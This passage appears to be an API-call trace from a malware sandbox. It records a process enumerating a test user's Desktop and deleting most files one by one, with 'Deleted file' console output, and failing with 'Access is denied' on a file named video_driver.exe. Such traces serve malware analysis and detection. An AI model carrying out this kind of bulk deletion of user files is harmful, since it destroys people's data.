ftLastWriteTime.dwHighDateTime=0x1d5d9c1, nFileSizeHigh=0x0, nFileSizeLow=0x1117c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HMYVWNui_rNMPXSZ.bmp", cAlternateFileName="HMYVWN~1.BMP")) returned 1 [0063.989] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HMYVWNui_rNMPXSZ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmyvwnui_rnmpxsz.bmp")) returned 1 [0063.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.990] GetFileType (hFile=0x7) returned 0x2 [0063.990] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.990] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.991] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.991] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.991] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.991] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HMYVWNui_rNMPXSZ.bmp\r\n") returned 0x4b [0063.992] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4b) returned 1 [0063.993] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3638d50, ftCreationTime.dwHighDateTime=0x1d5def1, ftLastAccessTime.dwLowDateTime=0x4b1f8180, ftLastAccessTime.dwHighDateTime=0x1d5db45, ftLastWriteTime.dwLowDateTime=0x4b1f8180, ftLastWriteTime.dwHighDateTime=0x1d5db45, nFileSizeHigh=0x0, nFileSizeLow=0x16f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="i0eSQ.mp3", cAlternateFileName="")) returned 1 [0063.993] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i0eSQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i0esq.mp3")) returned 1 [0063.994] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.994] GetFileType (hFile=0x7) returned 0x2 [0063.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.995] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.996] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.996] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i0eSQ.mp3\r\n") returned 0x40 [0063.996] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x40) returned 1 [0063.997] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ba33410, ftCreationTime.dwHighDateTime=0x1d5e556, ftLastAccessTime.dwLowDateTime=0xab91b470, ftLastAccessTime.dwHighDateTime=0x1d5d933, ftLastWriteTime.dwLowDateTime=0xab91b470, ftLastWriteTime.dwHighDateTime=0x1d5d933, nFileSizeHigh=0x0, nFileSizeLow=0x166aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="isH8zy.flv", cAlternateFileName="")) returned 1 [0063.997] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\isH8zy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ish8zy.flv")) returned 1 [0063.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.998] GetFileType (hFile=0x7) returned 0x2 [0063.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.999] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.000] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.000] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\isH8zy.flv\r\n") returned 0x41 [0064.000] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x41) returned 1 [0064.001] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef77100, ftCreationTime.dwHighDateTime=0x1d5e4cd, ftLastAccessTime.dwLowDateTime=0x178a4ba0, ftLastAccessTime.dwHighDateTime=0x1d5df98, ftLastWriteTime.dwLowDateTime=0x178a4ba0, ftLastWriteTime.dwHighDateTime=0x1d5df98, nFileSizeHigh=0x0, nFileSizeLow=0x9358, dwReserved0=0x0, dwReserved1=0x0, cFileName="KaGXpX_uv.docx", cAlternateFileName="KAGXPX~1.DOC")) returned 1 [0064.001] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KaGXpX_uv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kagxpx_uv.docx")) returned 1 [0064.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.004] GetFileType (hFile=0x7) returned 0x2 [0064.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.005] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.005] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.005] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KaGXpX_uv.docx\r\n") returned 0x45 [0064.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x45, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x45) returned 1 [0064.006] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd77cec0, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0x6ea3b250, ftLastAccessTime.dwHighDateTime=0x1d5d93a, ftLastWriteTime.dwLowDateTime=0x6ea3b250, ftLastWriteTime.dwHighDateTime=0x1d5d93a, nFileSizeHigh=0x0, nFileSizeLow=0xf312, dwReserved0=0x0, dwReserved1=0x0, cFileName="KGvZ520tJ.ods", cAlternateFileName="KGVZ52~1.ODS")) returned 1 [0064.007] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KGvZ520tJ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kgvz520tj.ods")) returned 1 [0064.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.010] GetFileType (hFile=0x7) returned 0x2 [0064.010] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.010] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.011] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.011] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.011] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.011] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KGvZ520tJ.ods\r\n") returned 0x44 [0064.011] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x44) returned 1 [0064.012] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41820a0, ftCreationTime.dwHighDateTime=0x1d5e395, ftLastAccessTime.dwLowDateTime=0xe221dc0, ftLastAccessTime.dwHighDateTime=0x1d5d9e6, ftLastWriteTime.dwLowDateTime=0xe221dc0, ftLastWriteTime.dwHighDateTime=0x1d5d9e6, nFileSizeHigh=0x0, nFileSizeLow=0x138c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="mcjVmrm7V7AJ6t.odt", cAlternateFileName="MCJVMR~1.ODT")) returned 1 [0064.012] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mcjVmrm7V7AJ6t.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mcjvmrm7v7aj6t.odt")) returned 1 [0064.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.015] GetFileType (hFile=0x7) returned 0x2 [0064.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.015] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.016] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.016] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mcjVmrm7V7AJ6t.odt\r\n") returned 0x49 [0064.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x49) returned 1 [0064.016] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="MFZCK7~1")) returned 1 [0064.016] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moG2C7rzW", cAlternateFileName="MOG2C7~1")) returned 1 [0064.017] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa03ee070, ftCreationTime.dwHighDateTime=0x1d5d91a, ftLastAccessTime.dwLowDateTime=0xd7c41440, ftLastAccessTime.dwHighDateTime=0x1d5ddd2, ftLastWriteTime.dwLowDateTime=0xd7c41440, ftLastWriteTime.dwHighDateTime=0x1d5ddd2, nFileSizeHigh=0x0, nFileSizeLow=0x9e5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="n8BHx-R0jAFi.mkv", cAlternateFileName="N8BHX-~1.MKV")) returned 1 [0064.017] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\n8BHx-R0jAFi.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n8bhx-r0jafi.mkv")) returned 1 [0064.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.018] GetFileType (hFile=0x7) returned 0x2 [0064.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.019] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.020] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.020] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\n8BHx-R0jAFi.mkv\r\n") returned 0x47 [0064.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x47) returned 1 [0064.021] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a2e9240, ftCreationTime.dwHighDateTime=0x1d5e74e, ftLastAccessTime.dwLowDateTime=0x135d9360, ftLastAccessTime.dwHighDateTime=0x1d5e5a2, ftLastWriteTime.dwLowDateTime=0x135d9360, ftLastWriteTime.dwHighDateTime=0x1d5e5a2, nFileSizeHigh=0x0, nFileSizeLow=0x1268a, dwReserved0=0x0, dwReserved1=0x0, cFileName="nF mzbmLsvv0e1OlZm.gif", cAlternateFileName="NFMZBM~1.GIF")) returned 1 [0064.021] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nF mzbmLsvv0e1OlZm.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nf mzbmlsvv0e1olzm.gif")) returned 1 [0064.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.023] GetFileType (hFile=0x7) returned 0x2 [0064.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.024] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.024] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.024] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nF mzbmLsvv0e1OlZm.gif\r\n") returned 0x4d [0064.024] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4d) returned 1 [0064.025] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f75900, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0x87c78630, ftLastAccessTime.dwHighDateTime=0x1d5dc8c, ftLastWriteTime.dwLowDateTime=0x87c78630, ftLastWriteTime.dwHighDateTime=0x1d5dc8c, nFileSizeHigh=0x0, nFileSizeLow=0x578c, dwReserved0=0x0, dwReserved1=0x0, cFileName="q8JQsFRXk.mp4", cAlternateFileName="Q8JQSF~1.MP4")) returned 1 [0064.026] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q8JQsFRXk.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q8jqsfrxk.mp4")) returned 1 [0064.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.027] GetFileType (hFile=0x7) returned 0x2 [0064.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.028] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.028] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.028] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q8JQsFRXk.mp4\r\n") returned 0x44 [0064.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x44) returned 1 [0064.029] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6e67780, ftCreationTime.dwHighDateTime=0x1d5e5e6, ftLastAccessTime.dwLowDateTime=0xe2ee22d0, ftLastAccessTime.dwHighDateTime=0x1d5dda4, ftLastWriteTime.dwLowDateTime=0xe2ee22d0, ftLastWriteTime.dwHighDateTime=0x1d5dda4, nFileSizeHigh=0x0, nFileSizeLow=0xffd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RlpYGAIBP9RiAuiDEA1C.bmp", cAlternateFileName="RLPYGA~1.BMP")) returned 1 [0064.029] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RlpYGAIBP9RiAuiDEA1C.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rlpygaibp9riauidea1c.bmp")) returned 1 [0064.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.033] GetFileType (hFile=0x7) returned 0x2 [0064.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.033] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.034] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.034] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RlpYGAIBP9RiAuiDEA1C.bmp\r\n") returned 0x4f [0064.034] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4f) returned 1 [0064.035] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="VIDEO_~1.EXE")) returned 1 [0064.035] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe")) returned 0 [0064.035] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VIDEO_~1.EXE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_~1.exe")) returned 0 [0064.036] GetLastError () returned 0x5 [0064.036] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x3ee3c4 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\r\n") returned 56 [0064.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.036] GetFileType (hFile=0x7) returned 0x2 [0064.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee384 | out: lpMode=0x3ee384) returned 1 [0064.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x3ee3b0, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee3b0*=0x38) returned 1 [0064.038] _get_osfhandle (_FileHandle=2) returned 0xb [0064.038] GetFileType (hFile=0xb) returned 0x2 [0064.038] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0064.038] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x3ee338 | out: lpMode=0x3ee338) returned 1 [0064.038] _get_osfhandle (_FileHandle=2) returned 0xb [0064.038] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x3ee36c | out: lpConsoleScreenBufferInfo=0x3ee36c) returned 1 [0064.039] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0064.040] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3ac | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0064.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x3ee390, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee390*=0x13) returned 1 [0064.041] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd311a320, ftCreationTime.dwHighDateTime=0x1d5e38d, ftLastAccessTime.dwLowDateTime=0xb17b4920, ftLastAccessTime.dwHighDateTime=0x1d5e2e6, ftLastWriteTime.dwLowDateTime=0xb17b4920, ftLastWriteTime.dwHighDateTime=0x1d5e2e6, nFileSizeHigh=0x0, nFileSizeLow=0xeac7, dwReserved0=0x0, dwReserved1=0x0, cFileName="vvdZxZXGy537svJ.mp4", cAlternateFileName="VVDZXZ~1.MP4")) returned 1 [0064.041] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvdZxZXGy537svJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvdzxzxgy537svj.mp4")) returned 1 [0064.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.044] GetFileType (hFile=0x7) returned 0x2 [0064.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.045] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.045] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, 